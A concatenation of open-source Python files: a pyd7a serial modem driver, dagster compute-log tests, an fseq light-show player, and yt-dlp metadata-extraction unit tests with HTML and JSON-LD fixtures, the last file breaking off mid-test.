videoStream.stop()
Pid.Remove("CV{0}".format(tmpCamID))
|
modem.py
|
#!/usr/bin/env python
#
# Copyright (c) 2015-2021 University of Antwerp, Aloxy NV.
#
# This file is part of pyd7a.
# See https://github.com/Sub-IoT/pyd7a for further info.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import time
from datetime import datetime
import struct
from threading import Thread
import threading
import logging
import serial
from bitstring import ConstBitStream
from d7a.alp.operands.file import DataRequest
from d7a.alp.operands.length import Length
from d7a.alp.operands.offset import Offset
from d7a.alp.operations.requests import ReadFileData
from d7a.alp.operations.responses import ReturnFileData
from d7a.alp.regular_action import RegularAction
from d7a.serial_modem_interface.parser import Parser, MessageType
from d7a.alp.command import Command
from d7a.system_files.firmware_version import FirmwareVersionFile
from d7a.system_files.uid import UidFile
from d7a.system_files.system_file_ids import SystemFileIds
class Modem:
def __init__(self, device, baudrate, unsolicited_response_received_callback=None, rebooted_callback=None, skip_alp_parsing=False):
self.log = logging.getLogger(__name__)
self.parser = Parser(skip_alp_parsing)
self.config = {
"device" : device,
"baudrate" : baudrate
}
self.lock=threading.Lock()
self.uid = None
self.firmware_version = None
self.skip_alp_parsing = skip_alp_parsing
self._sync_execution_response_cmds = []
self._sync_execution_tag_id = None
self._sync_execution_completed = False
self._unsolicited_responses_received = []
self._rebooted_received = []
self._read_async_active = False
self.unsolicited_response_received_callback = unsolicited_response_received_callback
self.rebooted_callback = rebooted_callback
self.connected = False
self.dev = serial.Serial(
port = self.config["device"],
baudrate = self.config["baudrate"],
timeout = None,
parity = serial.PARITY_NONE,
stopbits = serial.STOPBITS_ONE,
bytesize = serial.EIGHTBITS,
xonxoff = False,
rtscts = False,
dsrdtr = False,
exclusive = True,
)
self.dev.flush() # ignore possible buffered data
self.start_reading()
def connect(self, check_alive=True):
if self.connected:
return
if not check_alive:
self.connected = True
return True
read_modem_info_action = Command.create_with_read_file_action_system_file(UidFile())
read_modem_info_action.add_action(
RegularAction(
operation=ReadFileData(
operand=DataRequest(
offset=Offset(id=FirmwareVersionFile().id, offset=Length(0)), # TODO offset size
length=FirmwareVersionFile().length
)
)
)
)
if self.skip_alp_parsing:
self.log.info("Running in skip_alp_parsing mode, not checking if we can receive the modem's UID")
self.connected = True
self.execute_command_async(read_modem_info_action)
return True
resp_cmd = self.execute_command(read_modem_info_action, timeout_seconds=10)
if len(resp_cmd) == 0:
self.log.warning("Timed out reading node information")
return False
for action in resp_cmd[0].actions:
if type(action) is RegularAction and type(action.operation) is ReturnFileData:
if action.operand.offset.id == SystemFileIds.UID.value:
self.uid = '{:x}'.format(struct.unpack(">Q", str(bytearray(action.operand.data)))[0])
if action.operand.offset.id == SystemFileIds.FIRMWARE_VERSION.value:
self.firmware_version = FirmwareVersionFile.parse(ConstBitStream(bytearray(action.operand.data)), action.operand.offset.offset.value, action.operand.length.value)
if self.uid and self.firmware_version:
self.connected = True
if self.connected:
self.log.info("connected to {}, node UID {} running D7AP v{}, application \"{}\" with git sha1 {}".format(
self.config["device"], self.uid, self.firmware_version.d7ap_version,
self.firmware_version.application_name, self.firmware_version.git_sha1)
)
return True
else:
return False
def execute_command_async(self, alp_command):
self.execute_command(alp_command, timeout_seconds=0)
def execute_command(self, alp_command, timeout_seconds=10):
if self.skip_alp_parsing:
self.log.info("Running in skip_alp_parsing mode, execute_command() synchronously is not possible in this mode,"
"executing async instead ")
timeout_seconds = 0
data = self.parser.build_serial_frame(alp_command)
self._sync_execution_response_cmds = []
self._sync_execution_tag_id = None
self._sync_execution_completed = False
if(timeout_seconds > 0):
assert self._sync_execution_tag_id is None
self._sync_execution_tag_id = alp_command.tag_id
with self.lock:
self.dev.write(data)
self.dev.flush()
self.log.info("Sending command of size %s" % len(data))
self.log.debug("> " + " ".join(map(lambda b: format(b, "02x"), data)))
if timeout_seconds == 0:
return []
self.log.info("Waiting for response (max {} s)".format(timeout_seconds))
start_time = datetime.now()
while not self._sync_execution_completed and (datetime.now() - start_time).total_seconds() < timeout_seconds:
time.sleep(0.05)
if not self._sync_execution_completed:
self.log.info("Command timeout (tag {})".format(alp_command.tag_id))
return []
return self._sync_execution_response_cmds
def start_reading(self):
self._read_async_active = True
self.read_thread = Thread(target=self._read_async)
self.read_thread.daemon = True
self.read_thread.start()
def stop_reading(self):
self._read_async_active = False
self.dev.cancel_read()
self.read_thread.join()
def get_unsolicited_responses_received(self):
return self._unsolicited_responses_received
def clear_unsolicited_responses_received(self):
self._unsolicited_responses_received = []
def get_rebooted_received(self):
return self._rebooted_received
def clear_rebooted_received(self):
self._rebooted_received = []
def _read_async(self):
self.log.info("starting read thread")
data_received = bytearray()
while self._read_async_active:
try:
data_received = self.dev.read()
except serial.SerialException as e:
self.log.warning("SerialException {} received, trying to reconnect".format(e.errno))
self.dev.close()
time.sleep(5)
self.dev.open()
if len(data_received) > 0:
# self.log.debug("< " + " ".join(map(lambda b: format(b, "02x"), bytearray(data_received))))
(message_types, cmds, info) = self.parser.parse(data_received)
for error in info["errors"]:
error["buffer"] = " ".join(map(lambda b: format(b, "02x"), bytearray(data_received)))
self.log.warning("Parser error: {}".format(error))
cmd_cnt = 0
for cmd in cmds:
if not self.skip_alp_parsing and hasattr(cmd, 'tag_id') and self._sync_execution_tag_id != None and self._sync_execution_tag_id == cmd.tag_id and message_types[cmd_cnt] <= MessageType.PING_RESPONSE:
self.log.info("Received response for sync execution")
self._sync_execution_response_cmds.append(cmd)
if cmd.execution_completed:
self.log.info("cmd with tag {} done".format(cmd.tag_id))
self._sync_execution_completed = True
else:
self.log.info("cmd with tag {} not done yet, expecting more responses".format(cmd.tag_id))
elif self.unsolicited_response_received_callback != None and self.connected and message_types[cmd_cnt] <= MessageType.PING_RESPONSE: # skip responses until connected
self.unsolicited_response_received_callback(cmd)
elif message_types[cmd_cnt] == MessageType.REBOOTED:
if self.rebooted_callback != None:
self.rebooted_callback(cmd)
else:
self._rebooted_received.append(cmd)
elif message_types[cmd_cnt] == MessageType.LOGGING:
self.log.info("logging: {}".format(cmd))
elif message_types[cmd_cnt] <= MessageType.PING_RESPONSE:
self.log.info("Received a response which was not requested synchronously or no async callback provided")
self._unsolicited_responses_received.append(cmd)
cmd_cnt += 1
self.log.info("end read thread")
class ModemConnectionError(Exception):
pass
|
test_stdout.py
|
import os
import random
import string
import sys
import time
import pytest
from dagster import (
DagsterEventType,
InputDefinition,
ModeDefinition,
execute_pipeline,
pipeline,
reconstructable,
resource,
solid,
)
from dagster.core.execution.compute_logs import should_disable_io_stream_redirect
from dagster.core.instance import DagsterInstance
from dagster.core.storage.compute_log_manager import ComputeIOType
from dagster.core.test_utils import create_run_for_test, instance_for_test
from dagster.seven import multiprocessing
HELLO_SOLID = "HELLO SOLID"
HELLO_RESOURCE = "HELLO RESOURCE"
SEPARATOR = os.linesep if (os.name == "nt" and sys.version_info < (3,)) else "\n"
@resource
def resource_a(_):
print(HELLO_RESOURCE) # pylint: disable=print-call
return "A"
@solid
def spawn(_):
return 1
@solid(input_defs=[InputDefinition("num", int)], required_resource_keys={"a"})
def spew(_, num):
print(HELLO_SOLID) # pylint: disable=print-call
return num
def define_pipeline():
@pipeline(mode_defs=[ModeDefinition(resource_defs={"a": resource_a})])
def spew_pipeline():
spew(spew(spawn()))
return spew_pipeline
def normalize_file_content(s):
return "\n".join([line for line in s.replace(os.linesep, "\n").split("\n") if line])
@pytest.mark.skipif(
should_disable_io_stream_redirect(), reason="compute logs disabled for win / py3.6+"
)
def test_compute_log_to_disk():
with instance_for_test() as instance:
spew_pipeline = define_pipeline()
manager = instance.compute_log_manager
result = execute_pipeline(spew_pipeline, instance=instance)
assert result.success
compute_steps = [
event.step_key
for event in result.step_event_list
if event.event_type == DagsterEventType.STEP_START
]
for step_key in compute_steps:
if step_key.startswith("spawn"):
continue
compute_io_path = manager.get_local_path(result.run_id, step_key, ComputeIOType.STDOUT)
assert os.path.exists(compute_io_path)
with open(compute_io_path, "r") as stdout_file:
assert normalize_file_content(stdout_file.read()) == HELLO_SOLID
@pytest.mark.skipif(
should_disable_io_stream_redirect(), reason="compute logs disabled for win / py3.6+"
)
def test_compute_log_to_disk_multiprocess():
spew_pipeline = reconstructable(define_pipeline)
with instance_for_test() as instance:
manager = instance.compute_log_manager
result = execute_pipeline(
spew_pipeline,
run_config={"storage": {"filesystem": {}}, "execution": {"multiprocess": {}}},
instance=instance,
)
assert result.success
compute_steps = [
event.step_key
for event in result.step_event_list
if event.event_type == DagsterEventType.STEP_START
]
for step_key in compute_steps:
if step_key.startswith("spawn"):
continue
compute_io_path = manager.get_local_path(result.run_id, step_key, ComputeIOType.STDOUT)
assert os.path.exists(compute_io_path)
with open(compute_io_path, "r") as stdout_file:
assert normalize_file_content(stdout_file.read()) == HELLO_SOLID
@pytest.mark.skipif(
should_disable_io_stream_redirect(), reason="compute logs disabled for win / py3.6+"
)
def test_compute_log_manager():
with instance_for_test() as instance:
manager = instance.compute_log_manager
spew_pipeline = define_pipeline()
result = execute_pipeline(spew_pipeline, instance=instance)
assert result.success
compute_steps = [
event.step_key
for event in result.step_event_list
if event.event_type == DagsterEventType.STEP_START
]
assert len(compute_steps) == 3
step_key = "spew"
assert manager.is_watch_completed(result.run_id, step_key)
stdout = manager.read_logs_file(result.run_id, step_key, ComputeIOType.STDOUT)
assert normalize_file_content(stdout.data) == HELLO_SOLID
stderr = manager.read_logs_file(result.run_id, step_key, ComputeIOType.STDERR)
cleaned_logs = stderr.data.replace("\x1b[34m", "").replace("\x1b[0m", "")
assert "dagster - DEBUG - spew_pipeline - " in cleaned_logs
bad_logs = manager.read_logs_file("not_a_run_id", step_key, ComputeIOType.STDOUT)
assert bad_logs.data is None
assert not manager.is_watch_completed("not_a_run_id", step_key)
@pytest.mark.skipif(
should_disable_io_stream_redirect(), reason="compute logs disabled for win / py3.6+"
)
def test_compute_log_manager_subscriptions():
with instance_for_test() as instance:
spew_pipeline = define_pipeline()
step_key = "spew"
result = execute_pipeline(spew_pipeline, instance=instance)
stdout_observable = instance.compute_log_manager.observable(
result.run_id, step_key, ComputeIOType.STDOUT
)
stderr_observable = instance.compute_log_manager.observable(
result.run_id, step_key, ComputeIOType.STDERR
)
stdout = []
stdout_observable.subscribe(stdout.append)
stderr = []
stderr_observable.subscribe(stderr.append)
assert len(stdout) == 1
assert stdout[0].data.startswith(HELLO_SOLID)
assert stdout[0].cursor in [12, 13]
assert len(stderr) == 1
assert stderr[0].cursor == len(stderr[0].data)
assert stderr[0].cursor > 400
def gen_solid_name(length):
return "".join(random.choice(string.ascii_lowercase) for x in range(length))
@pytest.mark.skipif(
should_disable_io_stream_redirect(), reason="compute logs disabled for win / py3.6+"
)
def test_long_solid_names():
solid_name = gen_solid_name(300)
@pipeline(mode_defs=[ModeDefinition(resource_defs={"a": resource_a})])
def long_pipeline():
spew.alias(name=solid_name)()
with instance_for_test() as instance:
manager = instance.compute_log_manager
result = execute_pipeline(
long_pipeline,
instance=instance,
run_config={"solids": {solid_name: {"inputs": {"num": 1}}}},
)
assert result.success
compute_steps = [
event.step_key
for event in result.step_event_list
if event.event_type == DagsterEventType.STEP_START
]
assert len(compute_steps) == 1
step_key = compute_steps[0]
assert manager.is_watch_completed(result.run_id, step_key)
stdout = manager.read_logs_file(result.run_id, step_key, ComputeIOType.STDOUT)
assert normalize_file_content(stdout.data) == HELLO_SOLID
def execute_inner(step_key, pipeline_run, instance_ref):
instance = DagsterInstance.from_ref(instance_ref)
inner_step(instance, pipeline_run, step_key)
def inner_step(instance, pipeline_run, step_key):
with instance.compute_log_manager.watch(pipeline_run, step_key=step_key):
time.sleep(0.1)
print(step_key, "inner 1") # pylint: disable=print-call
print(step_key, "inner 2") # pylint: disable=print-call
print(step_key, "inner 3") # pylint: disable=print-call
time.sleep(0.1)
def expected_inner_output(step_key):
return "\n".join(
["{step_key} inner {num}".format(step_key=step_key, num=i + 1) for i in range(3)]
)
def expected_outer_prefix():
return "\n".join(["outer {num}".format(num=i + 1) for i in range(3)])
@pytest.mark.skipif(
should_disable_io_stream_redirect(), reason="compute logs disabled for win / py3.6+"
)
def test_single():
with instance_for_test() as instance:
pipeline_name = "foo_pipeline"
pipeline_run = create_run_for_test(instance, pipeline_name=pipeline_name)
step_keys = ["A", "B", "C"]
with instance.compute_log_manager.watch(pipeline_run):
print("outer 1") # pylint: disable=print-call
print("outer 2") # pylint: disable=print-call
print("outer 3") # pylint: disable=print-call
for step_key in step_keys:
inner_step(instance, pipeline_run, step_key)
for step_key in step_keys:
stdout = instance.compute_log_manager.read_logs_file(
pipeline_run.run_id, step_key, ComputeIOType.STDOUT
)
assert normalize_file_content(stdout.data) == expected_inner_output(step_key)
full_out = instance.compute_log_manager.read_logs_file(
pipeline_run.run_id, pipeline_name, ComputeIOType.STDOUT
)
assert normalize_file_content(full_out.data).startswith(expected_outer_prefix())
@pytest.mark.skipif(
should_disable_io_stream_redirect(), reason="compute logs disabled for win / py3.6+"
)
def test_multi():
with instance_for_test() as instance:
pipeline_name = "foo_pipeline"
pipeline_run = create_run_for_test(instance, pipeline_name=pipeline_name)
step_keys = ["A", "B", "C"]
with instance.compute_log_manager.watch(pipeline_run):
print("outer 1") # pylint: disable=print-call
print("outer 2") # pylint: disable=print-call
print("outer 3") # pylint: disable=print-call
for step_key in step_keys:
process = multiprocessing.Process(
target=execute_inner, args=(step_key, pipeline_run, instance.get_ref())
)
process.start()
process.join()
for step_key in step_keys:
stdout = instance.compute_log_manager.read_logs_file(
pipeline_run.run_id, step_key, ComputeIOType.STDOUT
)
assert normalize_file_content(stdout.data) == expected_inner_output(step_key)
full_out = instance.compute_log_manager.read_logs_file(
pipeline_run.run_id, pipeline_name, ComputeIOType.STDOUT
)
# The way that the multiprocess compute-logging interacts with pytest (which stubs out the
# sys.stdout fileno) makes this difficult to test. The pytest-captured stdout only captures
# the stdout from the outer process, not also the inner process
assert normalize_file_content(full_out.data).startswith(expected_outer_prefix())
|
player.py
|
from typing import Callable, List
import fseq
from enum import Enum
import pyaudio
import wave
class ParamError(Exception):
pass
class ChannelType(Enum):
UNKNOWN = -1
NOOP = 0
TRANSITION = 1 # the callback will be (channel, change_to_state)
def _run(channel_type_callback, seq, channel):
import time
channel_type_callback(channel, seq[0][1])
for i in range(1, len(seq)):
time.sleep((seq[i][0] - seq[i - 1][0]) / 1000)
channel_type_callback(channel, seq[i][1])
def playx(self):
chunk = 2048
data = self.wf.readframes(chunk)
while data != '':
if len(data) == 0:
break
self.stream.write(data)
data = self.wf.readframes(chunk)
class FSeqPlayer:
def __init__(self, fseq_file: str, music_path: str = None) -> None:
f = open(fseq_file, "rb")
fq = fseq.parse(f)
self.number_of_channel = fq.channel_count_per_frame
fd = []
for i in range(fq.number_of_frames):
d = fq.get_frame(i)
fd.append(d)
self.data = fd
self._step_time_in_ms = fq.step_time_in_ms
music_path = music_path
if music_path == None:
found = False
for key, value in fq.variable_headers:
if key == 'mf':
music_path = value
found = True
if not found:
raise ParamError("music_path not found in fseq, you need to supply on in param here")
self.wf = wave.open(music_path, 'rb')
self.p = pyaudio.PyAudio()
self.stream = self.p.open(format =
self.p.get_format_from_width(self.wf.getsampwidth()),
channels = self.wf.getnchannels(),
rate = self.wf.getframerate(),
output = True)
self.channel_types = [ChannelType.UNKNOWN for i in range(self.number_of_channel)]
def prepare_channel(self, channel_types: List[ChannelType] = None, channel_type_callback: Callable[[int], ChannelType] = None):
if channel_types != None:
assert len(channel_types) == self.number_of_channel
self.channel_types = channel_types
else:
for i in range(self.number_of_channel):
self.channel_types[i] = channel_type_callback(i)
self.trigger_channels = set()
self.seq = {}
for j in range(self.number_of_channel):
if self.channel_types[j] == ChannelType.TRANSITION:
self.trigger_channels.add(j)
last = self.data[0][j]
self.seq[j] = []
self.seq[j].append((0, last))
for i in range(1, len(self.data)):
t = self._step_time_in_ms * i
d = self.data[i][j]
if d != last:
self.seq[j].append((t, d))
last = d
def play(self, channel_type_callback: Callable[[int, int], None]):
import threading
threads = []
for j in self.trigger_channels:
threads.append(threading.Thread(target=_run, args=[channel_type_callback, self.seq[j], j]))
threads.append(threading.Thread(target=playx, args=[self]))
for t in threads:
t.start()
for t in threads:
t.join()
|
test_InfoExtractor.py
|
#!/usr/bin/env python3
from __future__ import unicode_literals
# Allow direct execution
import io
import os
import sys
import unittest
sys.path.insert(0, os.path.dirname(os.path.dirname(os.path.abspath(__file__))))
from test.helper import FakeYDL, expect_dict, expect_value, http_server_port
from yt_dlp.compat import compat_etree_fromstring, compat_http_server
from yt_dlp.extractor.common import InfoExtractor
from yt_dlp.extractor import YoutubeIE, get_info_extractor
from yt_dlp.utils import encode_data_uri, strip_jsonp, ExtractorError, RegexNotFoundError
import threading
TEAPOT_RESPONSE_STATUS = 418
TEAPOT_RESPONSE_BODY = "<h1>418 I'm a teapot</h1>"
class InfoExtractorTestRequestHandler(compat_http_server.BaseHTTPRequestHandler):
def log_message(self, format, *args):
pass
def do_GET(self):
if self.path == '/teapot':
self.send_response(TEAPOT_RESPONSE_STATUS)
self.send_header('Content-Type', 'text/html; charset=utf-8')
self.end_headers()
self.wfile.write(TEAPOT_RESPONSE_BODY.encode())
else:
assert False
class DummyIE(InfoExtractor):
pass
class TestInfoExtractor(unittest.TestCase):
def setUp(self):
self.ie = DummyIE(FakeYDL())
def test_ie_key(self):
self.assertEqual(get_info_extractor(YoutubeIE.ie_key()), YoutubeIE)
def test_html_search_regex(self):
html = '<p id="foo">Watch this <a href="http://www.youtube.com/watch?v=BaW_jenozKc">video</a></p>'
search = lambda re, *args: self.ie._html_search_regex(re, html, *args)
self.assertEqual(search(r'<p id="foo">(.+?)</p>', 'foo'), 'Watch this video')
def test_opengraph(self):
ie = self.ie
html = '''
<meta name="og:title" content='Foo'/>
<meta content="Some video's description " name="og:description"/>
<meta property='og:image' content='http://domain.com/pic.jpg?key1=val1&key2=val2'/>
<meta content='application/x-shockwave-flash' property='og:video:type'>
<meta content='Foo' property=og:foobar>
<meta name="og:test1" content='foo > < bar'/>
<meta name="og:test2" content="foo >//< bar"/>
<meta property=og-test3 content='Ill-formatted opengraph'/>
'''
self.assertEqual(ie._og_search_title(html), 'Foo')
self.assertEqual(ie._og_search_description(html), 'Some video\'s description ')
self.assertEqual(ie._og_search_thumbnail(html), 'http://domain.com/pic.jpg?key1=val1&key2=val2')
self.assertEqual(ie._og_search_video_url(html, default=None), None)
self.assertEqual(ie._og_search_property('foobar', html), 'Foo')
self.assertEqual(ie._og_search_property('test1', html), 'foo > < bar')
self.assertEqual(ie._og_search_property('test2', html), 'foo >//< bar')
self.assertEqual(ie._og_search_property('test3', html), 'Ill-formatted opengraph')
self.assertEqual(ie._og_search_property(('test0', 'test1'), html), 'foo > < bar')
self.assertRaises(RegexNotFoundError, ie._og_search_property, 'test0', html, None, fatal=True)
self.assertRaises(RegexNotFoundError, ie._og_search_property, ('test0', 'test00'), html, None, fatal=True)
def test_html_search_meta(self):
ie = self.ie
html = '''
<meta name="a" content="1" />
<meta name='b' content='2'>
<meta name="c" content='3'>
<meta name=d content='4'>
<meta property="e" content='5' >
<meta content="6" name="f">
'''
self.assertEqual(ie._html_search_meta('a', html), '1')
self.assertEqual(ie._html_search_meta('b', html), '2')
self.assertEqual(ie._html_search_meta('c', html), '3')
self.assertEqual(ie._html_search_meta('d', html), '4')
self.assertEqual(ie._html_search_meta('e', html), '5')
self.assertEqual(ie._html_search_meta('f', html), '6')
self.assertEqual(ie._html_search_meta(('a', 'b', 'c'), html), '1')
self.assertEqual(ie._html_search_meta(('c', 'b', 'a'), html), '3')
self.assertEqual(ie._html_search_meta(('z', 'x', 'c'), html), '3')
self.assertRaises(RegexNotFoundError, ie._html_search_meta, 'z', html, None, fatal=True)
self.assertRaises(RegexNotFoundError, ie._html_search_meta, ('z', 'x'), html, None, fatal=True)
def test_search_json_ld_realworld(self):
_TESTS = [
# https://github.com/ytdl-org/youtube-dl/issues/23306
(
r'''<script type="application/ld+json">
{
"@context": "http://schema.org/",
"@type": "VideoObject",
"name": "1 On 1 With Kleio",
"url": "https://www.eporner.com/hd-porn/xN49A1cT3eB/1-On-1-With-Kleio/",
"duration": "PT0H12M23S",
"thumbnailUrl": ["https://static-eu-cdn.eporner.com/thumbs/static4/7/78/780/780814/9_360.jpg", "https://imggen.eporner.com/780814/1920/1080/9.jpg"],
"contentUrl": "https://gvideo.eporner.com/xN49A1cT3eB/xN49A1cT3eB.mp4",
"embedUrl": "https://www.eporner.com/embed/xN49A1cT3eB/1-On-1-With-Kleio/",
"image": "https://static-eu-cdn.eporner.com/thumbs/static4/7/78/780/780814/9_360.jpg",
"width": "1920",
"height": "1080",
"encodingFormat": "mp4",
"bitrate": "6617kbps",
"isFamilyFriendly": "False",
"description": "Kleio Valentien",
"uploadDate": "2015-12-05T21:24:35+01:00",
"interactionStatistic": {
"@type": "InteractionCounter",
"interactionType": { "@type": "http://schema.org/WatchAction" },
"userInteractionCount": 1120958
}, "aggregateRating": {
"@type": "AggregateRating",
"ratingValue": "88",
"ratingCount": "630",
"bestRating": "100",
"worstRating": "0"
}, "actor": [{
"@type": "Person",
"name": "Kleio Valentien",
"url": "https://www.eporner.com/pornstar/kleio-valentien/"
}]}
</script>''',
{
'title': '1 On 1 With Kleio',
'description': 'Kleio Valentien',
'url': 'https://gvideo.eporner.com/xN49A1cT3eB/xN49A1cT3eB.mp4',
'timestamp': 1449347075,
'duration': 743.0,
'view_count': 1120958,
'width': 1920,
'height': 1080,
},
{},
),
(
r'''<script type="application/ld+json">
{
"@context": "https://schema.org",
"@graph": [
{
"@type": "NewsArticle",
"mainEntityOfPage": {
"@type": "WebPage",
"@id": "https://www.ant1news.gr/Society/article/620286/symmoria-anilikon-dikigoros-thymaton-ithelan-na-toys-apoteleiosoyn"
},
"headline": "Συμμορία ανηλίκων – δικηγόρος θυμάτων: ήθελαν να τους αποτελειώσουν",
"name": "Συμμορία ανηλίκων – δικηγόρος θυμάτων: ήθελαν να τους αποτελειώσουν",
"description": "Τα παιδιά δέχθηκαν την επίθεση επειδή αρνήθηκαν να γίνουν μέλη της συμμορίας, ανέφερε ο Γ. Ζαχαρόπουλος.",
"image": {
"@type": "ImageObject",
"url": "https://ant1media.azureedge.net/imgHandler/1100/a635c968-be71-447c-bf9c-80d843ece21e.jpg",
"width": 1100,
"height": 756 },
"datePublished": "2021-11-10T08:50:00+03:00",
"dateModified": "2021-11-10T08:52:53+03:00",
"author": {
"@type": "Person",
"@id": "https://www.ant1news.gr/",
"name": "Ant1news",
"image": "https://www.ant1news.gr/images/logo-e5d7e4b3e714c88e8d2eca96130142f6.png",
"url": "https://www.ant1news.gr/"
},
"publisher": {
"@type": "Organization",
"@id": "https://www.ant1news.gr#publisher",
"name": "Ant1news",
"url": "https://www.ant1news.gr",
"logo": {
"@type": "ImageObject",
"url": "https://www.ant1news.gr/images/logo-e5d7e4b3e714c88e8d2eca96130142f6.png",
"width": 400,
"height": 400 },
"sameAs": [
"https://www.facebook.com/Ant1news.gr",
"https://twitter.com/antennanews",
"https://www.youtube.com/channel/UC0smvAbfczoN75dP0Hw4Pzw",
"https://www.instagram.com/ant1news/"
]
},
"keywords": "μαχαίρωμα,συμμορία ανηλίκων,ΕΙΔΗΣΕΙΣ,ΕΙΔΗΣΕΙΣ ΣΗΜΕΡΑ,ΝΕΑ,Κοινωνία - Ant1news",
"articleSection": "Κοινωνία"
}
]
}
</script>''',
{
'timestamp': 1636523400,
'title': 'md5:91fe569e952e4d146485740ae927662b',
},
{'expected_type': 'NewsArticle'},
),
]
for html, expected_dict, search_json_ld_kwargs in _TESTS:
expect_dict(
self,
self.ie._search_json_ld(html, None, **search_json_ld_kwargs),
expected_dict
)
def test_download_json(self):
uri = encode_data_uri(b'{"foo": "blah"}', 'application/json')
self.assertEqual(self.ie._download_json(uri, None), {'foo': 'blah'})
uri = encode_data_uri(b'callback({"foo": "blah"})', 'application/javascript')
self.assertEqual(self.ie._download_json(uri, None, transform_source=strip_jsonp), {'foo': 'blah'})
uri = encode_data_uri(b'{"foo": invalid}', 'application/json')
self.assertRaises(ExtractorError, self.ie._download_json, uri, None)
self.assertEqual(self.ie._download_json(uri, None, fatal=False), None)
def test_parse_html5_media_entries(self):
# inline video tag
expect_dict(
self,
self.ie._parse_html5_media_entries(
'https://127.0.0.1/video.html',
r'<html><video src="/vid.mp4" /></html>', None)[0],
{
'formats': [{
'url': 'https://127.0.0.1/vid.mp4',
}],
})
# from https://www.r18.com/
# with kpbs in label
expect_dict(
self,
self.ie._parse_html5_media_entries(
'https://www.r18.com/',
r'''
<video id="samplevideo_amateur" class="js-samplevideo video-js vjs-default-skin vjs-big-play-centered" controls preload="auto" width="400" height="225" poster="//pics.r18.com/digital/amateur/mgmr105/mgmr105jp.jpg">
<source id="video_source" src="https://awscc3001.r18.com/litevideo/freepv/m/mgm/mgmr105/mgmr105_sm_w.mp4" type="video/mp4" res="240" label="300kbps">
<source id="video_source" src="https://awscc3001.r18.com/litevideo/freepv/m/mgm/mgmr105/mgmr105_dm_w.mp4" type="video/mp4" res="480" label="1000kbps">
<source id="video_source" src="https://awscc3001.r18.com/litevideo/freepv/m/mgm/mgmr105/mgmr105_dmb_w.mp4" type="video/mp4" res="740" label="1500kbps">
<p>Your browser does not support the video tag.</p>
</video>
''', None)[0],
{
'formats': [{
'url': 'https://awscc3001.r18.com/litevideo/freepv/m/mgm/mgmr105/mgmr105_sm_w.mp4',
'ext': 'mp4',
'format_id': '300kbps',
'height': 240,
'tbr': 300,
}, {
'url': 'https://awscc3001.r18.com/litevideo/freepv/m/mgm/mgmr105/mgmr105_dm_w.mp4',
'ext': 'mp4',
'format_id': '1000kbps',
'height': 480,
'tbr': 1000,
}, {
'url': 'https://awscc3001.r18.com/litevideo/freepv/m/mgm/mgmr105/mgmr105_dmb_w.mp4',
'ext': 'mp4',
'format_id': '1500kbps',
'height': 740,
'tbr': 1500,
}],
'thumbnail': '//pics.r18.com/digital/amateur/mgmr105/mgmr105jp.jpg'
})
# from https://www.csfd.cz/
# with width and height
expect_dict(
self,
self.ie._parse_html5_media_entries(
'https://www.csfd.cz/',
r'''
<video width="770" height="328" preload="none" controls poster="https://img.csfd.cz/files/images/film/video/preview/163/344/163344118_748d20.png?h360" >
<source src="https://video.csfd.cz/files/videos/157/750/157750813/163327358_eac647.mp4" type="video/mp4" width="640" height="360">
<source src="https://video.csfd.cz/files/videos/157/750/157750813/163327360_3d2646.mp4" type="video/mp4" width="1280" height="720">
<source src="https://video.csfd.cz/files/videos/157/750/157750813/163327356_91f258.mp4" type="video/mp4" width="1920" height="1080">
<source src="https://video.csfd.cz/files/videos/157/750/157750813/163327359_962b4a.webm" type="video/webm" width="640" height="360">
<source src="https://video.csfd.cz/files/videos/157/750/157750813/163327361_6feee0.webm" type="video/webm" width="1280" height="720">
<source src="https://video.csfd.cz/files/videos/157/750/157750813/163327357_8ab472.webm" type="video/webm" width="1920" height="1080">
<track src="https://video.csfd.cz/files/subtitles/163/344/163344115_4c388b.srt" type="text/x-srt" kind="subtitles" srclang="cs" label="cs">
</video>
''', None)[0],
{
'formats': [{
'url': 'https://video.csfd.cz/files/videos/157/750/157750813/163327358_eac647.mp4',
'ext': 'mp4',
'width': 640,
'height': 360,
}, {
'url': 'https://video.csfd.cz/files/videos/157/750/157750813/163327360_3d2646.mp4',
'ext': 'mp4',
'width': 1280,
'height': 720,
}, {
'url': 'https://video.csfd.cz/files/videos/157/750/157750813/163327356_91f258.mp4',
'ext': 'mp4',
'width': 1920,
'height': 1080,
}, {
'url': 'https://video.csfd.cz/files/videos/157/750/157750813/163327359_962b4a.webm',
'ext': 'webm',
'width': 640,
'height': 360,
}, {
'url': 'https://video.csfd.cz/files/videos/157/750/157750813/163327361_6feee0.webm',
'ext': 'webm',
'width': 1280,
'height': 720,
}, {
'url': 'https://video.csfd.cz/files/videos/157/750/157750813/163327357_8ab472.webm',
'ext': 'webm',
'width': 1920,
'height': 1080,
}],
'subtitles': {
'cs': [{'url': 'https://video.csfd.cz/files/subtitles/163/344/163344115_4c388b.srt'}]
},
'thumbnail': 'https://img.csfd.cz/files/images/film/video/preview/163/344/163344118_748d20.png?h360'
})
# from https://tamasha.com/v/Kkdjw
# with height in label
expect_dict(
self,
self.ie._parse_html5_media_entries(
'https://tamasha.com/v/Kkdjw',
r'''
<video crossorigin="anonymous">
<source src="https://s-v2.tamasha.com/statics/videos_file/19/8f/Kkdjw_198feff8577d0057536e905cce1fb61438dd64e0_n_240.mp4" type="video/mp4" label="AUTO" res="0"/>
<source src="https://s-v2.tamasha.com/statics/videos_file/19/8f/Kkdjw_198feff8577d0057536e905cce1fb61438dd64e0_n_240.mp4" type="video/mp4"
label="240p" res="240"/>
<source src="https://s-v2.tamasha.com/statics/videos_file/20/00/Kkdjw_200041c66f657fc967db464d156eafbc1ed9fe6f_n_144.mp4" type="video/mp4"
label="144p" res="144"/>
</video>
''', None)[0],
{
'formats': [{
'url': 'https://s-v2.tamasha.com/statics/videos_file/19/8f/Kkdjw_198feff8577d0057536e905cce1fb61438dd64e0_n_240.mp4',
}, {
'url': 'https://s-v2.tamasha.com/statics/videos_file/19/8f/Kkdjw_198feff8577d0057536e905cce1fb61438dd64e0_n_240.mp4',
'ext': 'mp4',
'format_id': '240p',
'height': 240,
}, {
